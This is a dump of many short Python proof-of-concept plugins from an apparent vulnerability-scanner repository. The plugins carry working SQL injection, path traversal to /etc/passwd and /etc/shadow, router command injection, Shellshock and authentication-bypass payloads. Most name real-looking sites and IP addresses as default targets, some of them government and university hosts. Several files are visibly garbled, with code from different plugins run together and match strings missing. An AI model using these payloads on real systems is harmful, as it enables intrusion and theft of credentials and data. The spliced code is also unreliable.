" in res: 16 | security_info(payload) 17 | if __name__ == '__main__': 18 | from dummy import * 19 | audit(assign('dalianqianhao', 'http://jwk.dlvtc.edu.cn/')[1]) 20 | audit(assign('dalianqianhao', 'http://218.7.95.52:800/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-107.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__author__ = 'Ario' 4 | 5 | def assign(service, arg): 6 | if service == "dedecms": 7 | return True, arg 8 | 9 | def audit(arg): 10 | url = arg 11 | _, head, body, _, _ = curl.curl(url + '/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa%5c%27and+char(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,md5(0x40776562736166657363616E40),5,6,7,8,9%20from%20`%23@__admin`%23') 12 | if body and body.find('2e0e20673083dea5cc87a85d54022049') != -1: 13 | security_hole(url) 14 | 15 | if __name__ == '__main__': 16 | from dummy import * 17 | audit(assign('dedecms', 'http://www.example.com/')[1]) 18 | -------------------------------------------------------------------------------- /exp_list/exp-1072.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import re 3 | 4 | def assign(service, arg): 5 | if service == "taodi": 6 | return True, arg 7 | 8 | def audit(arg): 9 | url = arg 10 | code, head, res, errcode, _ = curl.curl2(url + 'taodi/pic.php?url=cGljLnBocA==') 11 | if code == 200: 12 | m = re.search('file_get_contents', res) 13 | if m: 14 | security_info(m.group(0)) 15 | 16 | if __name__ == '__main__': 17 | from dummy import * 18 | audit(assign('taodi','http://127.0.0.1/')[1]) 19 | -------------------------------------------------------------------------------- /exp_list/exp-1074.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #author:小光 4 | #refer:http://www.wooyun.org/bugs/wooyun-2015-0106478 5 | 6 | 7 | def assign(service, arg): 8 | if service == "yongyou_zhiyuan_a6": 9 | return True, arg 10 | 11 | def audit(arg): 12 | url = 'yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17)%20union%20select%201,2,md5(123),1%23' 13 | target = arg + url 14 | code, head, res, errcode, _ = curl.curl2(target) 15 | if code ==200 and '202cb962ac59075b964b07152d234b70' in res : 16 | security_hole(arg) 17 | 18 | if __name__ == '__main__': 19 | from dummy import * 20 | audit(assign('yongyou_zhiyuan_a6', 'http://oa.wnq.com.cn/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-1076.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__author__ = 'ifk' 4 | #Refer https://www.bugscan.net/#!/x/2982 5 | 6 | import urlparse 7 | def assign(service, arg): 8 | if service == 'www': 9 | arr = urlparse.urlparse(arg) 10 | return True, '%s://%s/' % (arr.scheme, arr.netloc) 11 | 12 | def audit(arg): 13 | url = 'diagnostic.php' 14 | payload = 'act=ping&dst=www.baidu.com' 15 | code, head, res, errcode, _ = curl.curl2(arg+url,payload) 16 | if code == 200 and 'OK' in res: 17 | security_hole('dlink unauthenticated command injection '+arg+url) 18 | 19 | if __name__ == '__main__': 20 | from dummy import * 21 | audit(assign('www', 'http://83.233.183.198:8080/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-108.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__author__ = 'Ario' 4 | #SSV-ID: 61188 5 | 6 | def assign(service, arg): 7 | if service == "dedecms": 8 | return True, arg 9 | 10 | def audit(arg): 11 | url = arg + "plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D" 12 | _, head, body, _, re_url = curl.curl(url) 13 | if head and head.find('http://www.baidu.com') != -1: 14 | security_note(url) 15 | 16 | if __name__ == '__main__': 17 | from dummy import * 18 | audit(assign('dedecms', 'http://www.ceowo.com/')[1]) 19 | -------------------------------------------------------------------------------- /exp_list/exp-1104.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__author__ = 'ifk' 4 | #Refer http://www.wooyun.org/bugs/wooyun-2010-043380 5 | 6 | import urlparse 7 | def assign(service, arg): 8 | if service == "fsmcms": 9 | return True, arg 10 | 11 | def audit(arg): 12 | payload = '/setup/index.jsp' 13 | code, head, res, errcode, _ = curl.curl2(arg+payload) 14 | if code == 200 and 'alert') != -1 or clock()-start in range(7, 12): 18 | security_hole(url) 19 | 20 | if __name__ == '__main__': 21 | from dummy import * 22 | audit(assign('Tour', 'http://www.qdcqly.com')[1]) -------------------------------------------------------------------------------- /exp_list/exp-1132.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__author__ = 'ifk' 4 | #Refer http://www.wooyun.org/bugs/wooyun-2010-090403 5 | 6 | def assign(service, arg): 7 | if service == "suyaxing2004": 8 | return True, arg 9 | 10 | def audit(arg): 11 | payload = 'ws2004/SysManage/UserManage/SysManage/editxml.asp?ID=1' 12 | code, head, res, errcode, _ = curl.curl2(arg+payload) 13 | if code == 200 and '' in res: 14 | security_hole('Find admin passwd in '+arg+payload) 15 | 16 | if __name__ == '__main__': 17 | from dummy import * 18 | audit(assign('suyaxing2004', 'http://www.fzjcxx.cn/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-1136.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #-*- encoding:utf-8 -*- 3 | 4 | import re 5 | import urlparse 6 | def assign(service, arg): 7 | if service == "www": 8 | arr = urlparse.urlparse(arg) 9 | return True, '%s://%s/' % (arr.scheme, arr.netloc) 10 | 11 | def audit(arg): 12 | path = "boafrm/formSysCmd" 13 | payload = "sysCmd=whoami&apply=Apply&msg=" 14 | code, head, res, errcode, _ = curl.curl2(arg + path, post=payload) 15 | if code == 200 and 'root' in res and '<' not in res: 16 | security_hole(arg+path) 17 | 18 | if __name__ == '__main__': 19 | from dummy import * 20 | audit(assign('www', 'http://84.54.185.212/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-1138.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__author__ = 'ifk' 4 | #Refer http://www.wooyun.org/bugs/wooyun-2010-063128 5 | 6 | def assign(service, arg): 7 | if service == "suyaxing2004": 8 | return True, arg 9 | 10 | def audit(arg): 11 | payload = 'ws2004/sysManage/Resource/add/addResource.asp?FunID=1' 12 | code, head, res, errcode, _ = curl.curl2(arg+payload) 13 | if code == 200 and 'zip' in res: 14 | security_hole('未经授权访问 '+arg+payload) 15 | 16 | if __name__ == '__main__': 17 | from dummy import * 18 | audit(assign('suyaxing2004', 'http://www.fzjcxx.cn/')[1]) 19 | 20 | -------------------------------------------------------------------------------- /exp_list/exp-1139.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__author__ = 'ifk' 4 | #Refer http://www.wooyun.org/bugs/wooyun-2010-0110152 5 | 6 | def assign(service, arg): 7 | if service == "ipowercms": 8 | return True, arg 9 | 10 | def audit(arg): 11 | payload = 'm/manager/login.xml.php?username=admin\'%20or%20\'a\'=\'a&password=123&vcode=' 12 | code, head, res, errcode, _ = curl.curl2(arg+payload) 13 | if code == 200 and '1' in res: 14 | security_hole('万能密码 '+arg+payload) 15 | 16 | if __name__ == '__main__': 17 | from dummy import * 18 | audit(assign('ipowercms', 'http://www.cqukja.com/')[1]) 19 | 20 | -------------------------------------------------------------------------------- /exp_list/exp-1140.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__author__ = 'ifk' 4 | #Refer http://www.wooyun.org/bugs/wooyun-2010-065479 5 | 6 | def assign(service, arg): 7 | if service == "phpshe": 8 | return True, arg 9 | 10 | def audit(arg): 11 | payload = 'install/index.php?step=setting' 12 | code, head, res, errcode, _ = curl.curl2(arg+payload) 13 | if code == 200 and '([^<]+)',res) 15 | if r: 16 | security_info(r.group(1)) 17 | 18 | if __name__ == '__main__': 19 | from dummy import * 20 | audit(assign('eyou', 'http://mail.hzwk.cn/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-1148.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #-*- encoding:utf-8 -*- 3 | #__author__ = '1c3z' 4 | #http://www.wooyun.org/bugs/wooyun-2010-0105387 5 | 6 | def assign(service, arg): 7 | if service == "vicworl": 8 | return True, arg 9 | 10 | 11 | def audit(arg): 12 | import urllib2 13 | payloads = ['home.php?action=article&id=-1%20union%20all%20select%201%2C2%2C3%2C4%2Cmd5%280x22%29--'] 14 | for payload in payloads: 15 | url = arg + payload 16 | code, head,res, errcode, _ = curl.curl2(url) 17 | if 'b15835f133ff2e27c7cb28117bfae8f4' in res: 18 | security_hole(url) 19 | 20 | if __name__ == '__main__': 21 | from dummy import * 22 | audit(assign('vicworl', 'http://show.qzgb.com/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-1149.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #-*- encoding:utf-8 -*- 3 | #__author__ = '1c3z' 4 | #http://www.wooyun.org/bugs/wooyun-2010-0106292 5 | 6 | def assign(service, arg): 7 | if service == "vicworl": 8 | return True, arg 9 | 10 | 11 | def audit(arg): 12 | payload = 'data/backup/VICWOR~1.SQL' 13 | url = arg + payload 14 | code, head,res, errcode, _ = curl.curl2(url) 15 | if code == 200 and 'MySQL dump' in res: 16 | security_warning(url) 17 | 18 | if __name__ == '__main__': 19 | from dummy import * 20 | audit(assign('vicworl', 'http://218.7.16.70/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-1161.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__author__ = 'ifk' 4 | #Refer http://www.wooyun.org/bugs/wooyun-2012-04854 5 | 6 | def assign(service, arg): 7 | if service == "extmail": 8 | return True, arg 9 | 10 | def audit(arg): 11 | payload = 'extmail/cgi/env.cgi' 12 | code, head, res, errcode, _ = curl.curl2(arg+payload) 13 | if code == 200 and 'SERVER_ADMIN' in res: 14 | security_info(arg+payload) 15 | 16 | if __name__ == '__main__': 17 | from dummy import * 18 | audit(assign('extmail', 'http://mail.ca.suzhou.gov.cn/')[1]) 19 | 20 | -------------------------------------------------------------------------------- /exp_list/exp-1162.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__author__ = 'ifk' 4 | #Refer http://www.wooyun.org/bugs/wooyun-2010-015005 5 | 6 | def assign(service, arg): 7 | if service == "extmail": 8 | return True, arg 9 | 10 | def audit(arg): 11 | payload = 'extmail/cgi/index.cgi?__mode=' 12 | code, head, res, errcode, _ = curl.curl2(arg+payload) 13 | if code == 200 and 'testvul' in res: 14 | security_info('反射型 xss '+arg+payload) 15 | 16 | if __name__ == '__main__': 17 | from dummy import * 18 | audit(assign('extmail', 'http://mail.ca.suzhou.gov.cn/')[1]) 19 | 20 | -------------------------------------------------------------------------------- /exp_list/exp-1170.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__Author__ = 01001000entai 4 | #_PlugName_ = php168 zhidao sql 5 | #__Refer___ = http://www.wooyun.org/bugs/wooyun-2010-013476 6 | 7 | import re 8 | 9 | def assign(service, arg): 10 | if service == 'php168': 11 | return True, arg 12 | 13 | def audit(arg): 14 | payload = 'zhidao/user.php?j=question&u=-1+union+select+1,2,3,md5(1),5,6,7,8--' 15 | target = arg + payload 16 | code, head, body, errcode, final_url = curl.curl(target) 17 | if code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in body: 18 | security_hole(target) 19 | 20 | if __name__ == '__main__': 21 | from dummy import * 22 | audit(assign('php168', 'http://www.chcmcc.com/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-1179.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | def assign(service, arg): 5 | if service == "wordpress": 6 | return True, arg 7 | 8 | def audit(arg): 9 | payload = "wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress" 10 | url = arg + payload 11 | code, head, res, errcode, _ = curl.curl(url) 12 | if code == 200 and 'root' in res: 13 | security_hole(url) 14 | 15 | if __name__ == '__main__': 16 | from dummy import * 17 | audit(assign('wordpress', 'http://www.example.com/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-118.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__author__ = 'Seay' 4 | 5 | def assign(service, arg): 6 | if service == "discuz": 7 | return True, arg 8 | 9 | def audit(arg): 10 | url = arg 11 | _, head, body, _, _ = curl.curl(url + '/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28md5%281%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23') 12 | if body and body.find('c4ca4238a0b923820dcc509a6f75849b1') != -1: 13 | security_hole(url) 14 | 15 | if __name__ == '__main__': 16 | from dummy import * 17 | audit(assign('discuz', 'http://www.cnseay.com/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-1185.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__author__ = '0xAE' 4 | #_name_ = ' drupal full path disclousure' 5 | import re 6 | def assign(service, arg): 7 | if service == "drupal": 8 | return True, arg 9 | 10 | def audit(arg): 11 | payload='?q[]=x' 12 | verify_url = arg + payload 13 | pathinfo = re.compile(r' in (.*) on line') 14 | code, body,res, errcode, _ = curl.curl2(verify_url) 15 | match = pathinfo.search(body) 16 | if code == 200 and match: 17 | security_info('drupal full path disclousure vulnerability',verify_url) 18 | 19 | if __name__ == '__main__': 20 | from dummy import * 21 | audit(assign('drupal', 'http://www.example.com/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-1193.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #-*- encoding:utf-8 -*- 3 | #__author__ = '1c3z' 4 | 5 | 6 | def assign(service, arg): 7 | if service == "able_g2s": 8 | return True, arg 9 | 10 | 11 | def audit(arg): 12 | payload = 'G2S/ShowSystem/CourseExcellence.aspx?page=1&level=%E5%9B%BD%E5%AE%B6%E7%BA%A7%27%20and%201=2%20(select%20db_name(1))---' 13 | url = arg + payload 14 | code, head,res, errcode, _ = curl.curl2(url) 15 | if code == 200 and 'master' in res: 16 | security_hole(url) 17 | 18 | if __name__ == '__main__': 19 | from dummy import * 20 | audit(assign('able_g2s', 'http://cc.sbs.edu.cn/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-120.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__author__ = 'ver007' 4 | 5 | def assign(service, arg): 6 | if service == "phpcms": 7 | return True, arg 8 | 9 | def audit(arg): 10 | url = arg 11 | _, head, body, _, _ = curl.curl(url + '/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ') 12 | if body and body.find('authkey') != -1: 13 | security_hole(url) 14 | 15 | if __name__ == '__main__': 16 | from dummy import * 17 | audit(assign('phpcms', 'http://www.example.com/')[1]) 18 | -------------------------------------------------------------------------------- /exp_list/exp-1204.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | """POC Name : Discuz milu_seotool 插件 本地文件包含漏洞Author : haosen""" 5 | 6 | def assign(service, arg): 7 | if service == "discuz": 8 | return True, arg 9 | 10 | def audit(arg): 11 | payload = 'plugin.php?id=milu_seotool:sitemap&myac=../../robots.txt%00' 12 | url = arg + payload 13 | code, head, res, errcode, _ = curl.curl(url) 14 | if code == 200 and "User-agent" in res: 15 | security_hole(url) 16 | 17 | if __name__ == '__main__': 18 | from dummy import * 19 | audit(assign('discuz', 'http://code.daociyiyou.biz/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-1233.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Can import any built-in Python Library 3 | import urlparse 4 | def assign(service, arg): 5 | if service != "www": 6 | return 7 | arr = urlparse.urlparse(arg) 8 | return True, '%s://%s/inc/conn_db.inc' % (arr.scheme, arr.netloc) 9 | 10 | def audit(arg): 11 | code, head, res, errcode, final_url = curl.curl(arg) 12 | if code == 200 and 'db_id' in res and 'db_name' in res and 'db_pass' in res: 13 | security_warning(arg) 14 | 15 | 16 | if __name__ == '__main__': 17 | from dummy import * 18 | audit(assign('www', 'http://61.77.63.86/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-1238.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__Author__ = 01001000entai 4 | #_PlugName_ = easethink_cookie_sqli 5 | 6 | def assign(service, arg): 7 | if service == 'easethink': 8 | return True, arg 9 | 10 | def audit(arg): 11 | #No.1 http://www.wooyun.org/bugs/wooyun-2010-072094 12 | payload = "index.php" 13 | target = arg + payload 14 | code, head, body, errcode, final_url = curl.curl2(target,cookie='sort_field_idx=1=extractvalue(1,concat(0x5c,md5(1)))'); 15 | if 'c4ca4238a0b923820dcc509a6f75849' in body: 16 | security_hole(target) 17 | 18 | if __name__ == '__main__': 19 | from dummy import * 20 | audit(assign('easethink', 'http://demo.easethink.com/t1/')[1]) 21 | -------------------------------------------------------------------------------- /exp_list/exp-1252.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #author:IOT 4 | #refer:http://www.51cto.com/art/200812/100919.htm 5 | import base64 6 | def assign(service,arg): 7 | if service == "php168": 8 | return True,arg 9 | def audit(arg): 10 | base=arg+'/cache/adminlogin_logs.php' 11 | s=base64.b64encode(base) 12 | payload = "job.php?job=download&url=%s" % s 13 | url = arg + payload 14 | code ,head,res,body,_ = curl.curl(url) 15 | if code == 200 and 'logdb' in res: 16 | security_warning(url) 17 | 18 | 19 | if __name__ == '__main__': 20 | from dummy import * 21 | audit(assign('php168', 'http://www.hhzx.cn/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-1257.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__Author__ = 01001000entai 4 | #_PlugName_ = emlog database 5 | #__Refer___ = http://www.wooyun.org/bugs/wooyun-2010-099976 6 | 7 | def assign(service, arg): 8 | if service == 'emlog': 9 | return True, arg 10 | 11 | def audit(arg): 12 | payload = 'content/backup/EMLOG_~1.SQL' 13 | target = arg + payload 14 | code, head, body, errcode, final_url = curl.curl2(target); 15 | if code == 200 and '#version:emlog' in body: 16 | security_warning(target) 17 | 18 | if __name__ == '__main__': 19 | from dummy import * 20 | audit(assign('emlog', 'http://127.0.0.1/emlog/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-1258.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__Author__ = 01001000entai 4 | #_PlugName_ = qianhao .ini 5 | #__Refer___ = http://www.wooyun.org/bugs/wooyun-2010-063453 6 | 7 | import re 8 | 9 | def assign(service, arg): 10 | if service == 'dalianqianhao': 11 | return True, arg 12 | 13 | def audit(arg): 14 | payload = 'QHDBCONFIG.INI' 15 | target = arg + payload 16 | code, head, body, errcode, final_url = curl.curl2(target); 17 | if code == 200 and 'DB_USERNAME=' in body: 18 | security_hole(target) 19 | 20 | if __name__ == '__main__': 21 | from dummy import * 22 | audit(assign('dalianqianhao', 'http://cityjw.dlut.edu.cn:7001/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-1271.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | """ 5 | _POC Name_ : NS-AGS /commonplugin-Download.php 任意文件下载漏洞 6 | _References_: http://wooyun.org/bugs/wooyun-2014-058838 7 | _Author_ : 相守 8 | """ 9 | def assign(service, arg): 10 | if service == "ng-ags": 11 | return True, arg 12 | 13 | def audit(arg): 14 | url = arg 15 | payload='commonplugin/Download.php?licensefile=../../../../../../../../../../etc/shadow' 16 | code, head, res, errcode, _ = curl.curl(url +payload ) 17 | if code == 200 and "nobody" in res: 18 | security_hole(url+payload) 19 | 20 | if __name__ == '__main__': 21 | from dummy import * 22 | audit(assign('ng-ags', 'https://121.28.81.124/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-1278.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #-*- encoding:utf-8 -*- 3 | #__author__ = '1c3z' 4 | 5 | def assign(service, arg): 6 | if service == "libsys": 7 | return True, arg 8 | 9 | 10 | def audit(arg): 11 | import datetime 12 | crc = datetime.datetime.strftime(datetime.date.today(),'%m%d') 13 | payload = "opac/ajax_libsys_view.php?code=huiwen_opac&crc=" + crc[::-1] 14 | 15 | url = arg + payload 16 | code, head,res, errcode, _ = curl.curl2(url) 17 | if code == 200 and '[D_B] =>' in res and '

' not in res: 18 | security_hole(url) 19 | 20 | if __name__ == '__main__': 21 | from dummy import * 22 | audit(assign('libsys', 'http://202.192.1.40/')[1]) 23 | -------------------------------------------------------------------------------- /exp_list/exp-1279.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #author:小光 4 | #refer:http://www.wooyun.org/bugs/wooyun-2010-099533 5 | 6 | 7 | def assign(service, arg): 8 | if service == "es-cloud": 9 | return True, arg 10 | 11 | def audit(arg): 12 | payload = 'Easy/AppNew/GuideList.aspx?AppId=' 13 | getdata = 'db_name%281%29' 14 | url = arg + payload + getdata 15 | code, head, res, errcode, _url = curl.curl2(url) 16 | if code == 500 and 'master' in res: 17 | security_hole(url + " :found sql Injection") 18 | 19 | 20 | 21 | if __name__ == '__main__': 22 | from dummy import * 23 | audit(assign('es-cloud', 'http://521gx.com/')[1]) 24 | -------------------------------------------------------------------------------- /exp_list/exp-1280.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #__Refer___ = https://packetstormsecurity.com/files/125632/Kentico-CMS-7.0.75-User-Enumeration.html 3 | 4 | import re 5 | 6 | def assign(service, arg): 7 | if service == "kesioncms": 8 | return True, arg 9 | 10 | def audit(arg): 11 | url = arg 12 | code, head, res, errcode, _ = curl.curl(url + 'CMSModules/Messaging/CMSPages/PublicMessageUserSelector.aspx') 13 | if code == 200 and '' in res: 14 | security_info("Kentico CMS user name leakage success") 15 | 16 | if __name__ == '__main__': 17 | from dummy import * 18 | audit(assign('kesioncms', 'http://www.sqlpassnepal.org/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-1286.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__Author__ = 01001000entai 4 | #_PlugName_ = heeroa 5 | #__Refer___ = http://www.wooyun.org/bugs/wooyun-2010-058143 6 | 7 | def assign(service, arg): 8 | if service == 'heeroa': 9 | return True, arg 10 | 11 | def audit(arg): 12 | payload = "vfs?path=../../../../../../../../../../etc/passwd" 13 | target = arg + payload 14 | code, head, res, errcode, final_url = curl.curl2(target); 15 | if code == 200 and "root:" in res: 16 | security_hole(target) 17 | 18 | if __name__ == '__main__': 19 | from dummy import * 20 | audit(assign('heeroa', 'http://oa.lit.edu.cn/litoa/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-1289.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #-*- encoding:utf-8 -*- 3 | #__author__ = '1c3z' 4 | #ref http://wooyun.org/bugs/wooyun-2010-087296 5 | 6 | def assign(service, arg): 7 | if service == "kingosoft_xsweb": 8 | return True, arg 9 | 10 | 11 | def audit(arg): 12 | payload = 'pub/temp.aspx?type=menu&nj=wooyun%27%20union%20all%20select%201,db_name(1)--' 13 | url = arg + payload 14 | code, head,res, errcode, _ = curl.curl2(url) 15 | if code == 200 and 'master' in res : 16 | security_hole(url) 17 | 18 | if __name__ == '__main__': 19 | from dummy import * 20 | audit(assign('kingosoft_xsweb', 'http://stu.gxufe.cn/xsweb/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-1354.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #-*- coding:utf-8 -*- 3 | #Author:judger 4 | #SerType:iwebshop SQL-Injection 5 | def assign(service, arg): 6 | if service == "iwebshop": 7 | return True, arg 8 | 9 | def audit(arg): 10 | payload = '''index.php?controller=site&action=getProduct&specJSON={"judger":"1'%20and%201=0%20union%20select%20md5(1),2,3,4,5,6,7,8,9%20and%20'1'%20=%20'1"}''' 11 | url = arg + payload 12 | code, head, body, errcode, _url = curl.curl2(url) 13 | if code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in body: 14 | security_hole('SQL-Injection:' + url) 15 | 16 | 17 | if __name__ == '__main__': 18 | from dummy import * 19 | audit(assign('iwebshop', 'http://www.eastcang.com/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-1356.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__Author__ = Warsong 4 | #_PlugName_ = 万户ezeip任意文件下载 5 | #_Function_ = 插件格式 6 | #_FileName_ = whezeip_Download_Anything.py 7 | def assign(service, arg): 8 | if service == "whezeip": 9 | return True, arg 10 | 11 | def audit(arg): 12 | 13 | payload='download.ashx?files=../web.config' 14 | url=arg+payload 15 | code,head,body,errcode,fina_url=curl.curl(url) 16 | if code == 200 and 'rootRollingFile' in body and 'cachingConfiguration' in body: 17 | security_warning(url) 18 | if __name__ == '__main__': 19 | from dummy import * 20 | audit(assign('whezeip', 'http://www.zsty.org/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-1358.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #-*- coding:utf-8 -*- 3 | #Author:judger 4 | #SerType:jeecms arbitrary file download 5 | def assign(service, arg): 6 | if service == "jeecms": 7 | return True, arg 8 | 9 | def audit(arg): 10 | payload = "download.jspx?fpath=WEB-INF/web.xml&filename=WEB-INF/web.xml" 11 | url = arg + payload 12 | code, head, body, errcode, _url = curl.curl2(url) 13 | if code == 200 and 'com.jeecms.common.web.ProcessTimeFilter' in body: 14 | security_hole('Arbitrary file download:'+url) 15 | 16 | if __name__ == '__main__': 17 | from dummy import * 18 | audit(assign('jeecms', 'http://www.xxczj.gov.cn/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-1359.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__Author__ = ali 4 | #_FileName_ = SiteFactory CMS 5.5.9.py 5 | #https://www.bugscan.net/#!/x/22441 6 | 7 | def assign(service, arg): 8 | if service == "sitefactory": 9 | return True, arg 10 | 11 | def audit(arg): 12 | payload = 'sitefactory/assets/download.aspx?file=c%3a\windows\win.ini' 13 | target = arg + payload 14 | code,head,body,_,_ = curl.curl2(target) 15 | if code == 200 and '[mci extensions]' in body: 16 | security_hole(arg) 17 | 18 | if __name__ == '__main__': 19 | from dummy import * 20 | audit(assign('sitefactory', 'http://www.astridlindgrenshembygd.se/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-1363.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #-*- encoding:utf-8 -*- 3 | #__author__ = '1c3z' 4 | #ref http://wooyun.org/bugs/wooyun-2014-077491 5 | 6 | def assign(service, arg): 7 | if service == "ecscms": 8 | return True, arg 9 | 10 | 11 | def audit(arg): 12 | payload = 'OperationManage/SubSiteMoreIndex.aspx?pkId=511&subSiteId=256&kw=Xasd%25%27%20and%201=db_name%281%29--&st=1&t=1' 13 | url = arg + payload 14 | code, head,res, errcode, _ = curl.curl2(url) 15 | if code == 500 and 'master' in res and 'nvarchar' in res and 'int' in res: 16 | security_hole(url) 17 | 18 | if __name__ == '__main__': 19 | from dummy import * 20 | audit(assign('ecscms', 'http://www.zjhzyg.net/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-138.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__author__ = 'boy' 4 | 5 | 6 | def assign(service, arg): 7 | if service == "php168": 8 | return True, arg 9 | 10 | def audit(arg): 11 | code, head, res, errcode,finalurl = curl.curl('%snews/js.php?type=hot&f_id=23)' % arg) 12 | m = res.find("SELECT") 13 | if m!=-1: 14 | security_info('find sql injection:%snews/js.php?type=hot&f_id=23)'% arg) 15 | if __name__ == '__main__': 16 | from dummy import * 17 | audit(assign('php168', 'http://www.ly910.com/')[1]) 18 | -------------------------------------------------------------------------------- /exp_list/exp-139.py: -------------------------------------------------------------------------------- 1 | # -*- coding: cp936 -*- 2 | """ 3 | scanner - Network scanner. 4 | Author : Tommy. 5 | """ 6 | __version__ = '1.0' 7 | 8 | def assign(service, arg): 9 | if service == "www": 10 | if "cgi-bin" in arg: 11 | return True, arg 12 | 13 | def audit(arg): 14 | payload = '''() { :;}; echo d5f4f931d08210b1ed6e98d26b6318b6:''' 15 | code, head, res, errcode, _ = curl.curl('-A "%s" %s' %(payload,arg)) 16 | if code == 200 and 'd5f4f931d08210b1ed6e98d26b6318b6' in head+res: 17 | security_hole(arg) 18 | 19 